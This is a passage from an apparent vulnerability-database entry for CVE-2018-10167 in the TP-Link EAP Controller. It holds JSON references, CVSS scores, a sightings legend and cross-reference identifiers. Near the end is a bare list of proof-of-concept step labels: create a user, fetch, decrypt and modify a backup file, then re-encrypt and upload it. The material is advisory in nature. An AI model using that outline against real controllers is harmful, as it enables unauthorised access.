                "Third Party Advisory"
              ],
              "url": "https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities"
            },
            {
              "name": "104094",
              "refsource": "BID",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securityfocus.com/bid/104094"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.0,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 6.8,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2018-06-12T18:30Z",
      "publishedDate": "2018-05-03T18:29Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2018-10167 (GCVE-0-2018-10167)

GHSA-G9P8-H989-GP6G

VAR-201805-0361

create user

-- coding: utf-8 --

get backup file

decrypt backup file

modify decrypted backup file

encrypt the file and save it

upload patched backup file

CNVD-2018-10974

FKIE_CVE-2018-10167

GSD-2018-10167

Tags

Sightings

Nomenclature